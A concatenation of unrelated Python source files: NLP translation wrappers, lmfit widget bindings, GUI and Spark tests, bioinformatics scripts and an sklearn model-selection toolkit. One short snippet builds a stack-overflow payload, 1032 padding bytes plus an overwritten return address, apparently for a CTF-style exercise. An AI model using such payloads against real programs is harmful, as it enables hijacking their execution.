from pangeamt_toolkit.pangeanmt.onmtx_translation import OnmtxTranslation
class OnmtxTranslator(_Translator):
def translate(self, src, with_attn=True, batch_size=None, phrase_table=""):
src_dir = None
attn_debug = False
if with_attn:
attn_debug = True
if batch_size is None:
raise ValueError("batch_size must be set")
data = inputters.Dataset(
self.fields,
readers=([self.src_reader]),
data=[("src", src)],
dirs=[src_dir],
sort_key=inputters.str2sortkey[self.data_type],
filter_pred=self._filter_pred,
)
data_iter = inputters.OrderedIterator(
dataset=data,
device=self._dev,
batch_size=batch_size,
train=False,
sort=False,
sort_within_batch=False,
shuffle=False,
)
# Translate
xlation_builder = _TransBuilder(
data,
self.fields,
self.n_best,
self.replace_unk,
None,
self.phrase_table,
)
results = []
for batch in data_iter:
batch_data = self.translate_batch(
batch, data.src_vocabs, attn_debug
)
translations = xlation_builder.from_batch(batch_data)
for translation in translations:
simple_translation = OnmtxTranslation(
translation.src,
translation.src_raw,
translation.pred_sents[0],
translation.attns[0],
translation.pred_scores[0],
)
results.append(simple_translation)
return results
|
from __future__ import (absolute_import, division, print_function)
import lmfit
import traitlets
import ipywidgets as ipyw
import weakref
from qef.io import log_qef
class ParameterWidget(ipyw.Box):
r"""One possible representation of a fitting parameter.
Inherits from `ipywidgets.widgets.widget_box.Box <https://github.com/jupyter-widgets/ipywidgets/blob/v7.0.0a1/ipywidgets/widgets/widget_box.py#L18>`_
Parameters
----------
show_header : Bool
Hide or show names of the widget components `min`, `value`,...
""" # noqa: E501
def __init__(self, show_header=True):
def el_ly(w):
return dict(width='{}px'.format(w), margin='0px')
# minimum block
self.nomin = ipyw.Checkbox(value=True, layout=el_ly(125))
self.min = ipyw.FloatText(value=-float('inf'), layout=el_ly(165))
box_ly = dict(border='1px solid black', display='flex', margin='0px',
flex_flow='row', width='290px')
self.minbox = ipyw.Box([self.nomin, self.min], layout=box_ly)
# value element
self.value = ipyw.FloatText(value=0, layout=el_ly(170))
# maximum block
self.nomax = ipyw.Checkbox(value=True, layout=el_ly(125))
self.max = ipyw.FloatText(value=float('inf'), layout=el_ly(165))
self.maxbox = ipyw.Box([self.nomax, self.max], layout=box_ly)
# constraints block
self.vary = ipyw.Checkbox(value=True, layout=el_ly(125))
self.expr = ipyw.Text(value='', continuous_update=False,
layout=el_ly(275))
# array elements in an horizontal block
self.elements = [self.minbox, self.value, self.maxbox,
self.vary, self.expr]
# Header labels
self.header = None
if show_header is True:
d_lbs = (('-inf', 125), ('min', 165), ('value', 170),
('inf', 125), ('max', 165), ('vary', 125),
('expression', 275))
l_lbs = [ipyw.Label(k, layout=el_ly(v)) for (k, v) in d_lbs]
box_ly = dict(display='flex', margin='0px', border='solid')
self.header = ipyw.HBox(l_lbs, layout=box_ly)
# Layout
if self.header is None:
box_ly = dict(display='flex', margin='0px', border='solid',
flex_flow='row')
super(ParameterWidget, self).__init__(self.elements, layout=box_ly)
else:
box_ly = dict(display='flex', margin='0px', border='solid')
b_els = ipyw.HBox(self.elements, layout=box_ly)
box_ly.update({'flex_flow': 'column'})
super(ParameterWidget, self).__init__([self.header, b_els],
layout=box_ly)
class ParameterCallbacksMixin(object):
r"""Implement relationships between the different components of an
ipywidget exposing all or some of the parameter attributes
The methods in this Mixin expects attribute :code:`facade`,
a dictionary whose keys coincide with tuple
:const:`~qef.widgets.parameter.ParameterCallbacksMixin.widget_names`
and whose values are either :code:`None` or references to ipywidgets.
Attribute :code:`facade` can be created with
function :func:`~qef.widgets.parameter.add_widget_facade`."""
#: Representation of infinity value
inf = float('inf')
widget_names = ('nomin', 'min', 'value', 'nomax', 'max', 'vary', 'expr')
def validate_facade(self):
r"""Ascertain that keys of :code:`facade` attribute are contained in
:const:`~qef.widgets.parameter.ParameterCallbacksMixin.widget_names`"""
fs = set(self.facade.keys())
assert set(ParameterCallbacksMixin.widget_names).issuperset(fs)
def initialize_callbacks(self):
r"""Register callbacks to sync widget components"""
self.validate_facade()
for widget_name in self.facade:
widget = self.facade[widget_name]
if widget is not None:
callback = getattr(self, widget_name + '_value_change')
widget.observe(callback, 'value', 'change')
def nomin_value_change(self, change):
r"""Set :code:`min` to :math:`-\infty` if :code:`nomin` is checked"""
if 'min' in self.facade and change.new is True:
if self.facade['min'].value > -self.inf: # prevent cycles
self.facade['min'].value = -self.inf
def min_value_change(self, change):
r"""Notify other widgets if :code:`min` changes.
0. Reject change if :code:`min` becomes bigger than :code:`max`
1. Uncheck :code:`nomin` if new value is entered in :code:`min`
2. Update :code:`value.value` if it becomes smaller than
:code:`min.value`"""
f = self.facade
if 'max' in f and change.new > f['max'].value:
f['min'].value = change.old # reject change
else: # Notify other widgets
if 'nomin' in f and change.new > -self.inf:
f['nomin'].value = False
if 'value' in f and change.new > f['value'].value:
f['value'].value = change.new
def nomax_value_change(self, change):
r"""Set :code:`max` to :math:`\infty` if :code:`nomax` is checked"""
if 'max' in self.facade and change.new is True:
if self.facade['max'].value < self.inf: # prevent cycles
self.facade['max'].value = self.inf
def max_value_change(self, change):
r"""Notify other widgets if :code:`min` changes.
0. Reject change if :code:`max` becomes smaller than :code:`min`
1. Uncheck :code:`nomax` if new value is entered in :code:`max`
2. Update :code:`value.value` if it becomes bigger than
:code:`max.value`"""
f = self.facade
if 'min' in f and change.new < f['min'].value:
f['max'].value = change.old # reject change
else: # Notify other widgets
if 'nomax' in f and change.new < self.inf:
f['nomax'].value = False
if 'value' in f and change.new < f['value'].value:
f['value'].value = change.new
def value_value_change(self, change):
r"""Validate :code:`value` is within bounds. Otherwise set
:code:`value` as the closest bound value"""
if 'min' in self.facade and change.new < self.facade['min'].value:
self.facade['value'].value = self.facade['min'].value
elif 'max' in self.facade and change.new > self.facade['max'].value:
self.facade['value'].value = self.facade['max'].value
def vary_value_change(self, change):
r"""enable/disable editing of :code:`min`, :code:`max`, :code:`value`,
and :code:`expr`"""
for name in ('nomin', 'min', 'value', 'nomax', 'max', 'expr'):
if name in self.facade:
self.facade['name'].disabled = not change.new
def expr_value_change(self, change):
r"""enable/disable :code:`min`, :code:`max`, and :code:`value`"""
if 'vary' in self.facade:
self.facade['vary'].value = True if change.new == '' else False
def create_facade(widget, mapping=None):
r"""Create :code:`facade` dictionary where keys are standard
:const:`~qef.widgets.parameter.ParameterCallbacksMixin.widget_names`
and whose values are simple ipywidgets that control the fitting
parameter attributes denoted by the standard
:const:`~qef.widgets.parameter.ParameterCallbacksMixin.widget_names`.
Parameters
----------
widget: `ipywidgets.widgets.widget.Widget <https://github.com/jupyter-widgets/ipywidgets/blob/v7.0.0a1/ipywidgets/widgets/widget.py#L238>`_
mapping : str, dict, or None
if `str`, mapping denotes the widget name to be associated with
the widget. If `dict`, then `mapping` values are attribute names
of `widget`, referencing the simple ipywidgets to be associated
to standard widget names. The widget names are the keys of `mapping`.
If :code:`None`, an inspection of `widget` attributes will be performed,
looking for names that coincide with standard widget names. If the
inspection is unsuccessful, the widget will be associated with the
standard widget name 'value' to represent the values taken by the
fitting parameter.
Returns
-------
facade : dict
""" # noqa: E501
names = ParameterCallbacksMixin.widget_names # expected widget names
if mapping is not None:
if isinstance(mapping, str) and mapping in names:
# subscribing a non-composite widget
facade = {mapping: widget}
elif isinstance(mapping, dict):
k = set(mapping.keys())
if k & set(names) != k:
msg = 'mapping contains invalid widget names'
log_qef.error(msg)
raise KeyError(msg)
facade = {name: widget.__dict__[wn]
for name, wn in mapping.items()}
else: # inspection
facade = {name: widget.__dict__[name] for name in names
if name in widget.__dict__}
if bool(facade) is False:
facade = {'value': widget}
return facade
def add_widget_facade(widget, mapping=None):
r"""Create :code:`facade` dictionary where keys are standard
:const:`~qef.widgets.parameter.ParameterCallbacksMixin.widget_names`
and whose values are simple ipywidgets that control the fitting
parameter attributes denoted by the standard
:const:`~qef.widgets.parameter.ParameterCallbacksMixin.widget_names`.
This dictionary is added to the input widget as an attribute.
Parameters
----------
widget: `ipywidgets.widgets.widget.Widget <https://github.com/jupyter-widgets/ipywidgets/blob/v7.0.0a1/ipywidgets/widgets/widget.py#L238>`_
mapping : str, dict, or None
if `str`, mapping denotes the widget name to be associated with
the widget. If `dict`, then `mapping` values are attribute names
of `widget`, referencing the simple ipywidgets to be associated
to standard widget names. The widget names are the keys of `mapping`.
If :code:`None`, an inspection of `widget` attributes will be performed,
looking for names that coincide with standard widget names. If the
inspection is unsuccessful, the widget will be associated with the
standard widget name 'value' to represent the values taken by the
fitting parameter.
Returns
-------
widget : :class:`~ipywidgets:ipywidgets.widgets.widget.Widget`
Reference to input widget
""" # noqa: E501
widget.facade = create_facade(widget, mapping=mapping)
return widget
def add_widget_callbacks(widget, mapping=None):
r"""Extend the widget's type with
:class:`~qef.widgets.parameter.ParameterCallbacksMixin`
Parameters
----------
widget: `ipywidgets.widgets.widget.Widget <https://github.com/jupyter-widgets/ipywidgets/blob/v7.0.0a1/ipywidgets/widgets/widget.py#L238>`_
mapping : str, dict, or None
if `str`, :code:`mapping` denotes the widget name to be associated with
the widget. If `dict`, then :code:`mapping` values are attribute names
of `widget`, referencing the simple ipywidgets to be associated
to standard
:const:`~qef.widgets.parameter.ParameterCallbacksMixin.widget_names`.
The widget names are the keys of :code:`mapping`.
If :code:`None`, an inspection of `widget` attributes will be
performed, looking for names that coincide with standard
:const:`~qef.widgets.parameter.ParameterCallbacksMixin.widget_names`.
If the inspection is unsuccessful, the widget will be associated
with the standard widget name 'value' to represent the values taken
by the fitting parameter.
""" # noqa: E501
base_class = widget.__class__
widget.__class__ = type(base_class.__name__,
(base_class, ParameterCallbacksMixin), {})
widget.initialize_callbacks()
class ParameterWithTraits(lmfit.Parameter, traitlets.HasTraits):
r"""Wrapper of :class:`~lmfit.parameter.Parameter` with
:class:`~traitlets.TraitType` allows synchronization with ipywidgets
Same signature for initialization as that of
:class:`~lmfit.parameter.Parameter`.
Parameters
----------
name : str, optional
Name of the Parameter.
value : float, optional
Numerical Parameter value.
vary : bool, optional
Whether the Parameter is varied during a fit (default is True).
min : float, optional
Lower bound for value (default is `-numpy.inf`, no lower bound).
max : float, optional
Upper bound for value (default is `numpy.inf`, no upper bound).
expr : str, optional
Mathematical expression used to constrain the value during the fit.
brute_step : float, optional
Step size for grid points in the `brute` method.
user_data : optional
User-definable extra attribute used for a Parameter.
"""
#: :class:`~lmfit.parameter.Parameter` attribute names
param_attrs = ('_val', 'min', 'max', 'vary', '_expr')
#: :class:`~lmfit.parameter.Parameter` feature names
param_features = ('value', 'min', 'max', 'vary', 'expr')
#: :class:`~traitlets.TraitType` instances in sync with
#: :class:`~lmfit.parameter.Parameter` attributes
trait_names = ('tvalue', 'tmin', 'tmax', 'tvary', 'texpr')
#: :class:`~traitlets.Float` trailet wrapping
#: :class:`~lmfit.parameter.Parameter` attribute :code:`value`
tvalue = traitlets.Float(allow_none=True)
#: :class:`~traitlets.Float` trailet wrapping
#: :class:`~lmfit.parameter.Parameter` attribute :code:`_val`
tmin = traitlets.Float()
#: :class:`~traitlets.Float` trailet wrapping
#: :class:`~lmfit.parameter.Parameter` attribute :code:`min`
tmax = traitlets.Float()
#: :class:`~traitlets.Bool` trailet wrapping
#: :class:`~lmfit.parameter.Parameter` attribute :code:`vary`
tvary = traitlets.Bool()
#: :class:`~traitlets.Unicode` trailet wrapping
#: :class:`~lmfit.parameter.Parameter` attribute :code:`_expr`
texpr = traitlets.Unicode(allow_none=True)
@classmethod
def feature_to_trait(cls, feature):
r"""From :class:`~lmfit.parameter.Parameter` feature name to
:class:`~traitlets.TraitType` name"""
try:
return cls.trait_names[cls.param_features.index(feature)]
except KeyError:
msg = '{} is not a parameter feature'.format(feature)
log_qef.error(msg)
raise KeyError(msg)
@classmethod
def attr_to_trait(cls, attr):
r"""From :class:`~lmfit.parameter.Parameter` attribute name to
:class:`~traitlets.TraitType` name"""
try:
return cls.trait_names[cls.param_attrs.index(attr)]
except KeyError:
msg = '{} is not a parameter feature'.format(attr)
log_qef.error(msg)
raise KeyError(msg)
@classmethod
def trait_to_attr(cls, name):
r"""From :class:`~traitlets.TraitType` name to
:class:`~lmfit.parameter.Parameter` attribute name"""
try:
return cls.param_attrs[cls.trait_names.index(name)]
except KeyError:
msg = '{} is not a valid trait'.format(name)
log_qef.error(msg)
raise KeyError(msg)
def __init__(self, name=None, value=None, vary=True, min=-float('inf'),
max=float('inf'), expr=None, brute_step=None, user_data=None):
kwargs = dict(name=name, value=value, vary=vary, min=min, max=max,
expr=expr, brute_step=brute_step, user_data=user_data)
lmfit.Parameter.__init__(self, **kwargs)
self._widget_links = weakref.WeakSet()
def __repr__(self):
r"""String representation at debug level"""
p_repr = super(ParameterWithTraits, self).__repr__()
return '<ParameterWithTraits {}>'.format(p_repr)
def __setattr__(self, key, value):
r"""Setting attributes making sure :class:`~lmfit.parameter.Parameter`
attributes and :class:`~traitlets.TraitType` stay in sync"""
if key in ParameterWithTraits.param_attrs:
# attribute of Parameter
lmfit.Parameter.__setattr__(self, key, value)
other_key = ParameterWithTraits.attr_to_trait(key)
other_value = getattr(self, other_key)
if value != other_value: # prevent cycling
traitlets.HasTraits.__setattr__(self, other_key, value)
else:
# attribute of HasTraits
traitlets.HasTraits.__setattr__(self, key, value)
if key in ParameterWithTraits.trait_names:
other_key = ParameterWithTraits.trait_to_attr(key)
other_value = getattr(self, other_key)
if value != other_value: # prevent cycling
lmfit.Parameter.__setattr__(self, other_key, value)
def link_widget(self, widget, mapping=None):
r"""Link the value of a single ipywidget to one trait, or the values
of the element widgets of a composite ipywidget to different traits.
The specific traits can be specified with the :code:`mapping` argument.
Parameters
----------
widget: `ipywidgets.widgets.widget.Widget <https://github.com/jupyter-widgets/ipywidgets/blob/v7.0.0a1/ipywidgets/widgets/widget.py#L238>`_
mapping : str, dict, or None
if `str`, :code:`mapping` denotes the widget name to be associated
with the widget. If `dict`, then :code:`mapping` values are
attribute names of `widget`, referencing the simple ipywidgets to
be associated to standard
:const:`~qef.widgets.parameter.ParameterCallbacksMixin.widget_names`.
The widget names are the keys of :code:`mapping`. If :code:`None`,
an inspection of `widget` attributes will be performed,
looking for names that coincide with standard
:const:`~qef.widgets.parameter.ParameterCallbacksMixin.widget_names`.
If the inspection is unsuccessful, the widget will be associated
with the standard widget name 'value' to represent the values
taken by the fitting parameter.
""" # noqa: E501
add_widget_facade(widget, mapping=mapping)
add_widget_callbacks(widget, mapping=mapping)
for pn, w in widget.facade.items():
tname = self.feature_to_trait(pn)
if w not in [l.target[0] for l in self._widget_links]:
lnk = traitlets.link((self, tname), (w, 'value'))
self._widget_links.add(lnk)
|
import os
import sys
from PySide2 import QtWidgets
from sleap.gui.dialogs.filedialog import FileDialog
def test_non_native_dialog():
save_env_non_native = os.environ.get("USE_NON_NATIVE_FILE", None)
os.environ["USE_NON_NATIVE_FILE"] = ""
d = dict()
FileDialog._non_native_if_set(d)
is_linux = sys.platform.startswith("linux")
if is_linux:
assert d["options"] == QtWidgets.QFileDialog.DontUseNativeDialog
else:
assert "options" not in d
os.environ["USE_NON_NATIVE_FILE"] = "1"
d = dict()
FileDialog._non_native_if_set(d)
assert d["options"] == QtWidgets.QFileDialog.DontUseNativeDialog
if save_env_non_native is not None:
os.environ["USE_NON_NATIVE_FILE"] = save_env_non_native
|
from PyQt5.QtWidgets import QWidget
from widgets import ImageButton
class SearchButton(ImageButton):
"""
Search and download image button with personalized style sheet
"""
def __init__(self, size: int = 28, parent: QWidget = None):
super().__init__('search-download', size, size, parent)
self.setToolTip('Search & Download')
def initStyleSheet(self):
self.setObjectName('SearchButton')
self.setStyleSheet('#SearchButton{border: none; padding: 1px;} #SearchButton:hover{background: rgba(0, 0, 0, 10%);}') |
import struct
def dq(v):
return struct.pack("Q", v)
with open("payload", "wb") as f:
f.write("A" * 1032)
f.write(dq(0x400616))
|
from bifrostlib import common
from bifrostlib.datahandling import Sample
from bifrostlib.datahandling import SampleComponentReference
from bifrostlib.datahandling import SampleComponent
from bifrostlib.datahandling import Category
from typing import Dict
import os
import json
import re
def extract_cgmlst(chewbbaca: Category, results: Dict, component_name: str) -> None:
output_folder = os.path.join(component_name, 'chewbbaca_results')
# chewbacca output gets thrown into a folder called results_<yearmonthday>someothertext
chewbbaca_output_folder = [i for i in os.listdir(output_folder) if re.match("results_[0-9]{6}.*", i)][0]
file_name = os.path.join("chewbbaca_results", chewbbaca_output_folder, "results_alleles.tsv")
file_key = common.json_key_cleaner(file_name)
file_path = os.path.join(component_name, file_name)
with open(file_path) as input:
lines = input.readlines()
lines = [i.strip() for i in lines]
allele_names = lines[0].split()[1:]
allele_values = lines[1].split()[1:]
allele_dict = {allele_names[i]:allele_values[i] for i in range(len(allele_names))}
results[file_key] = allele_dict
#chewbbaca['summary']['alleles'] = allele_dict
chewbbaca['report']['data'].append({"alleles":allele_dict})
def datadump(samplecomponent_ref_json: Dict):
samplecomponent_ref = SampleComponentReference(value=samplecomponent_ref_json)
samplecomponent = SampleComponent.load(samplecomponent_ref)
sample = Sample.load(samplecomponent.sample)
#chewbbaca = samplecomponent.get_category("chewbbaca")
#print(resistance) # it's the appending that's duplicated because resistance is not none
#if resistance is None:
chewbbaca = Category(value={
"name": "chewbbaca",
"component": {"id": samplecomponent["component"]["_id"], "name": samplecomponent["component"]["name"]},
"summary": {"sequence_type":None},
"report": {"data":[]}
}
)
extract_cgmlst(chewbbaca, samplecomponent["results"], samplecomponent["component"]["name"])
samplecomponent.set_category(chewbbaca)
sample_category = sample.get_category("chewbbaca")
if sample_category == None:
sample.set_category(chewbbaca)
else:
current_category_version = extract_digits_from_component_version(chewbbaca['component']['name'])
sample_category_version = extract_digits_from_component_version(sample_category['component']['name'])
print(current_category_version, sample_category_version)
if current_category_version >= sample_category_version:
sample.set_category(chewbbaca)
common.set_status_and_save(sample, samplecomponent, "Success")
with open(os.path.join(samplecomponent["component"]["name"], "datadump_complete"), "w+") as fh:
fh.write("done")
def extract_digits_from_component_version(component_str):
version_re = re.compile(".*__(v.*)__.*")
version_group = re.match(version_re, component_str).groups()[0]
version_digits = int("".join([i for i in version_group if i.isdigit()]))
return version_digits
datadump(
snakemake.params.samplecomponent_ref_json,
)
|
import warnings
warnings.filterwarnings("ignore")
# basic package
import os
import sys
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import bisect
# feature selection package
from sklearn.model_selection import train_test_split
from sklearn.model_selection import learning_curve
from sklearn.model_selection import validation_curve
from sklearn.model_selection import cross_val_score
from sklearn import linear_model
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import PolynomialFeatures
from scipy.stats import boxcox
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection.from_model import SelectFromModel
from sklearn.feature_selection import chi2
from sklearn.feature_selection import RFECV
from sklearn.feature_selection import VarianceThreshold
from mlxtend.feature_selection import ExhaustiveFeatureSelector as EFS
from sklearn.decomposition import PCA
# classification package
from sklearn.naive_bayes import GaussianNB
from sklearn.ensemble import AdaBoostClassifier, RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression, LassoCV
from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn import svm
from sklearn.svm import SVC
# regression package
from sklearn import metrics
from sklearn.neural_network import MLPRegressor
from sklearn.preprocessing import PolynomialFeatures
from sklearn.linear_model import Perceptron
from sklearn.neural_network import MLPClassifier
from sklearn.model_selection import cross_val_predict
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
# plot cumulative explained variance vs. number of components
def pcaPlot(df):
df_pca = PCA().fit(df);
explained_var = np.cumsum(df_pca.explained_variance_ratio_)
plt.plot(explained_var)
plt.grid(True)
plt.title('(PCA) Num. of Components vs. Cumulative explained variance')
plt.xlabel('number of components')
plt.ylabel('cumulative explained variance')
plt.show()
# print(explained_var)
# return number of components with explained variance >= 90%
return bisect.bisect_left(explained_var, 0.9)
# compute feature relevance(correlation) to target class
# and redundancy with other features
# return a table with all features ranked by correlation from high to low
# and redundancy from low to high
# relevance formula: correlation with target class
# redundancy formula: sum of absolute value of correlation with other features / (number of features - 1)
def mrmr(x, y):
corr_matrix_abs = abs(x.corr())
lst = []
features = x.head()
corr = (x.astype(float)).corrwith(y.astype(float))
depend = (corr_matrix_abs.sum(axis=1) - 1)/ (len(features) - 1)
lst = zip(features, corr, depend)
lst = sorted(lst, key=lambda x: (x[1], -1 * abs(x[2])), reverse=True)
output = pd.DataFrame(lst, columns=['Feature', 'Correlation (absolute value high to low)', 'Dependency (low to high)'])
return output
def optimalRegression(x_train, x_test, y_train, y_test):
# metrics
mean_absolute_errors=[]
# regression model
models = [linear_model.LinearRegression(),
linear_model.Ridge(fit_intercept=True, alpha=0.0, random_state=0, normalize=True),
linear_model.Lasso(alpha = 0.1),
linear_model.ElasticNet(),
linear_model.Lars(n_nonzero_coefs=1),
linear_model.LassoLars(),
linear_model.OrthogonalMatchingPursuit(),
linear_model.LogisticRegression(C=1.0, penalty='l1', tol=1e-6),
linear_model.SGDRegressor(),
MLPRegressor(solver='lbfgs'),
linear_model.PassiveAggressiveRegressor(random_state=0),
linear_model.RANSACRegressor(),
linear_model.TheilSenRegressor(random_state=42),
linear_model.HuberRegressor(fit_intercept=True, alpha=0.0, max_iter=100),
Pipeline([
('poly', PolynomialFeatures(degree=5, include_bias=False)),
('linreg', linear_model.LinearRegression(normalize=True))
])]
# model name
names = ['Linear_Regression',
'Ridge_Regression',
'Lasso',
'Elastic_Net',
'Least_Angle_Regression',
'LARS_Lasso',
'Orthogonal_Matching_Pursuit',
'Logistic_Regression',
'Stochastic_Gradient_Descent',
'Perceptron_Algorithms',
'Passive-aggressive_Algorithms',
'RANSAC',
'Theil_SEN',
'Huber_Regression',
'Polynomial_Regression']
for model in models:
try:
model.fit(x_train, y_train)
predictions = cross_val_predict(model, x_test, y_test, cv=5)
mean_absolute_errors.append(metrics.mean_absolute_error(y_test,predictions))
except:
mean_absolute_errors.append('n/a')
df = pd.DataFrame({'Model_reference': models,
'Model_name': names,
'Mean_absolute_err': mean_absolute_errors})
df.sort_values(by='Mean_absolute_err', ascending=True, inplace=True)
df = df.reset_index(drop=True)
print(df[['Model_name','Mean_absolute_err']])
print("Optimal model is " + str(df['Model_name'][0]) + " with error " + str(df['Mean_absolute_err'][0]))
print("Second Optimal model is " + str(df['Model_name'][1]) + " with error " + str(df['Mean_absolute_err'][1]))
name1 = str(df['Model_name'][0])
name2 = str(df['Model_name'][1])
model1 = None
model2 = None
for model,name in zip(models,names):
if name == str(df['Model_name'][0]):
model1 = model
elif name == str(df['Model_name'][1]):
model2 = model
return model1, name1, model2, name2
# find best classifier by score
def optimalClassifier(x_train, x_test, y_train, y_test):
classifiers = [DecisionTreeClassifier(random_state=0),
GaussianNB(),
SVC(),
AdaBoostClassifier(n_estimators=100),
GradientBoostingClassifier(n_estimators=100, learning_rate=1.0, max_depth=1, random_state=0),
LogisticRegression(random_state=1),
KNeighborsClassifier(n_neighbors=7),
RandomForestClassifier(n_estimators=10, max_depth=None, min_samples_split=2, random_state=0),
svm.SVC(kernel='linear', C = 1.0)]
names = ['DecisionTree','Gaussian_NB','SK_learn','AdaBoost','Gradient_Boosting','Logistic_Regression','K_Nearest_Neighbors','Random_Forest','SVM']
means = []
for classifier in classifiers:
try:
classifier.fit(x_train, y_train)
scores = cross_val_score(classifier, x_test, y_test, cv=5)
means.append(scores.mean())
except:
means.append(0)
df = pd.DataFrame({'Classifier_reference':classifiers,
'Classifier_name':names,
'Score':means})
df.sort_values(by='Score', ascending=False, inplace=True)
df = df.reset_index(drop=True)
print(df[['Classifier_name','Score']])
print("Optimal classifier is " + str(df['Classifier_name'][0]) + " with score " + str(df['Score'][0]))
print("Second Optimal classifier is " + str(df['Classifier_name'][1]) + " with score " + str(df['Score'][1]))
name1 = str(df['Classifier_name'][0])
name2 = str(df['Classifier_name'][1])
classifier1 = None
classifier2 = None
for classifier,name in zip(classifiers,names):
if name == str(df['Classifier_name'][0]):
classifier1 = classifier
elif name == str(df['Classifier_name'][1]):
classifier2 = classifier
return classifier1, name1, classifier2, name2
# get the best number of features
def getBestK(x_train, x_test, y_train, y_test, classifier, name):
classifier.fit(x_train, y_train)
scores = cross_val_score(classifier, x_test, y_test, cv=5)
highest_score = np.mean(scores)
std = np.std(scores)
k_value = len(x_train.columns)# total number of features
selected_features = list(x_train.head())
means = []
stds = []
# get feature subset of all size
# update best number of features
for i in range(1, len(x_train.columns)+1):
print("current number of features: " + str(i))
select = SelectKBest(k=i)
select.fit(x_train, y_train)
x_train_selected = select.transform(x_train)
cols = list(x_train.columns[select.get_support(indices=True)])
x_test_selected = x_test[cols]
classifier.fit(x_train_selected, y_train)
scores = cross_val_score(classifier, x_test_selected, y_test, cv=5)
if np.mean(scores) > highest_score or (np.mean(scores) == highest_score and np.std(scores) < std):
highest_score = np.mean(scores)
std = np.std(scores)
k_value = i
selected_features = cols
means.append(np.mean(scores))
stds.append(np.std(scores))
print("Number of features: " + str(k_value) + ", accuracy score " + str(highest_score))
print("The selected features are: \n" + str(pd.DataFrame({'Feature':selected_features})))
x_axis = np.array(range(1, len(x_train.columns)+1))
means = np.array(means)
stds = np.array(stds)
# plot number of features vs. cross validation score with standard deviation shading
plt.figure()
plt.title("Number of features vs. Cross Val Score (" + name + ")")
plt.xlabel("Number of features selected")
plt.ylabel("Cross validation score of number of selected features")
plt.plot(x_axis, means, 'o-', color='g')
plt.fill_between(x_axis, means + stds, means - stds, alpha=0.15, color='g')
plt.show()
return selected_features
# univariance feature selection
def univariance(x, y, k_value):
if k_value > len(x.columns):
print("There are only " + str(len(x.columns)) + " features, change k to " + str(len(x.columns)) + "...")
k_value = len(x.columns)
selector = SelectKBest(k=k_value)
fit = selector.fit(x, y)
scores = pd.DataFrame(fit.scores_)
features = pd.DataFrame(x.columns)
table = pd.concat([features,scores],axis=1)
table.columns = ['Feature','Score']
print("Number of Features: " + str(k_value))
return table.nlargest(k_value,'Score')
# Recursive Feature Elimination
def RFEFeatSelect(x, y, classifier):
try:
step_value = 1
if len(x.columns) > 500:
step_value = int(round(len(x.columns)/100))
rfe = RFECV(estimator=classifier, step=step_value, scoring='accuracy')
fit = rfe.fit(x, y)
feature_selected = []
for bool, feature in zip(fit.support_, list(x)):
if bool:
feature_selected.append(feature)
print("Number of Features: " + str(fit.n_features_))
# plot number of features vs. cross validation score
plt.figure()
plt.title("(RFE) Number of feature vs. Cross Validation Score")
plt.xlabel("Number of features selected")
plt.ylabel("Cross validation score of number of selected features")
plt.plot(range(1, len(rfe.grid_scores_) + 1), rfe.grid_scores_)
plt.show()
return pd.DataFrame({"Feature": feature_selected})
except RuntimeError:
print(sys.exc_info())
return pd.DataFrame(columns=['Empty'])
# select from model using classifier
def modelFeatSelect(x, y, classifier, k_value):
try:
sfm = SelectFromModel(classifier, threshold=0.1)
sfm.fit(x, y)
n_features = sfm.transform(x).shape[1]
while n_features > k_value:
sfm.threshold += 0.05
x_transform = sfm.transform(x)
n_features = x_transform.shape[1]
index = sfm.get_support()
features = pd.DataFrame({"Feature": x.columns[index]})
print("Number of Features: " + str(k_value))
return features
except ValueError:
print(sys.exc_info())
return pd.DataFrame(columns=['Empty']) |
from argparse import ArgumentParser
from asreview import ASReviewData
from asreview.analysis import Analysis
from asreview.entry_points.base import BaseEntryPoint
class DifficultEntryPoint(BaseEntryPoint):
description = "Show the most difficult records."
def __init__(self):
super(DifficultEntryPoint, self).__init__()
from asreviewcontrib.pro.__init__ import __version__
from asreviewcontrib.pro.__init__ import __extension_name__
self.version = __version__
self.extension_name = __extension_name__
def execute(self, argv):
parser = _parse_arguments()
arg_dict = vars(parser.parse_args(argv))
state_path = arg_dict["state_path"]
data_path = arg_dict["data_path"]
top_n = arg_dict["top"]
as_data = ASReviewData.from_file(data_path)
order, ttd = self.find_order(state_path)
for key in order[:top_n]:
print(f"{ttd[key]:.2f} %")
as_data.print_record(key)
def find_order(self, state_path):
analysis = Analysis.from_path(state_path)
ttd = analysis.avg_time_to_discovery(result_format="percentage")
analysis.close()
order = sorted(ttd, key=lambda x: -ttd[x])
return order, ttd
def _parse_arguments():
parser = ArgumentParser(prog="asreview difficult")
parser.add_argument(
'state_path',
type=str,
help="Path to state/log file to analyze."
)
parser.add_argument(
'data_path',
type=str,
help="Path to data file corresponding to the state file."
)
parser.add_argument(
"-n", "--top",
type=int,
default=3,
help="Determines how many entries are shown."
)
return parser
|
import string
from Bio.Seq import Seq
from Bio import SeqIO
filepath = "/home/prokriti/HumanALDH2.fasta"
filepath1 = "/home/prokriti/MutatedHumanALDH2.fasta"
filepath2 = "/home/prokriti/mutatedgreenopsin.fasta"
filepath3 = "/home/prokriti/greenopsin.fasta"
def read(filepath: str):
reads = list(SeqIO.parse(filepath, "fasta"))
for i in reads:
rf1 = i.seq[0:]
return rf1
def protein(s):
p = s.transcribe()
p = p.translate()
return p
#a = read(filepath)
#b = read(filepath1)
#c = protein(a)
#d = protein(b)
#print("Non Asian Flush")
#print(c)
#print("Asian Flush")
#print(d)
r1 = read(filepath2)
r2 = read(filepath3)
p1 = protein(r1)
p2 = protein(r2)
print(">HumanGreenOpsin")
print(p2)
print(">MutatedGreenOpsin")
print(p1)
|
import unittest
from pyspark.sql.tests import ReusedSQLTestCase
class TreeReduceTestCase(ReusedSQLTestCase):
def test_treereduce(self):
words = ["Settlements", "some", "centuries", "old", "and", "still", "no", "bigger", "than", "pinheads", "on",
"the", "untouched", "expanse", "of", "their", "background"]
words_rdd = self.spark.sparkContext.parallelize(words)
word_lengths = words_rdd.map(lambda word: len(word))
def add(left, right):
return left + right
self.assertEqual(word_lengths.treeReduce(add, 1), 93)
self.assertEqual(word_lengths.treeReduce(add, 2), 93)
